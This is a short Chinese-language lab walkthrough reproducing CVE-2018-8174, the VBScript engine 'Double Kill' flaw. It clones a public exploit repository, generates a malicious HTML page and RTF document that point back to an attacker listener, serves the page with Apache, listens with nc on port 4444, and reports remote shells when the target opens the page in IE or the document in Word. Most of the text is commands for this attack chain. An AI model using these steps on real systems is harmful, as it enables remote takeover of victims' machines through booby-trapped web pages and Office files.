双杀 0day 漏洞(CVE-2018-8174)复现
漏洞描述:
CVE-2018-8174 是 Windows VBScript Engine 代码执行漏洞。
微软在4月20日早上确认此漏洞,并于5月8号发布了官方安全补丁,对该 0day 漏洞进行了修复,将其命名为 CVE-2018-8174
由于 VBScript 脚本执行引擎(vbscript.dll)存在代码执行漏洞,攻击者可以将恶意的VBScript嵌入到Office文件或者网站中,一旦用户不小心点击,远程攻击者可以获取当前用户权限执行脚本中的恶意代码。
漏洞复现:
攻击机 IP:192.168.220.160
靶机 IP:192.168.220.161
项目地址:https://github.com/Sch01ar/CVE-2018-8174_EXP
┌─[root@sch01ar]─[/sch01ar] └──╼ #git clone https://github.com/Sch01ar/CVE-2018-8174_EXP
ls 看一下
生成带有恶意 VBscript 的 html 页面和 word 文档
┌─[root@sch01ar]─[/sch01ar/CVE-2018-8174_EXP] └──╼ #python CVE-2018-8174.py -u http://192.168.220.160/exploit.html -o msf.rtf -i 192.168.220.160 -p 4444
-u:URL 地址
-o:生成文档
-i:监听地址
-p:监听端口
查看一下生成的文件
把 explot.html 复制到 /var/www/html,并开启 apache 服务
┌─[root@sch01ar]─[/sch01ar/CVE-2018-8174_EXP] └──╼ #cp exploit.html /var/www/html ┌─[root@sch01ar]─[/sch01ar/CVE-2018-8174_EXP] └──╼ #service apache2 start
用 nc 监听 4444 端口
用靶机的 IE 浏览器打开恶意 URL
攻击机收到靶机的 shell 会话
在靶机用 word 打开 msf.rtf
攻击机同样也收到会话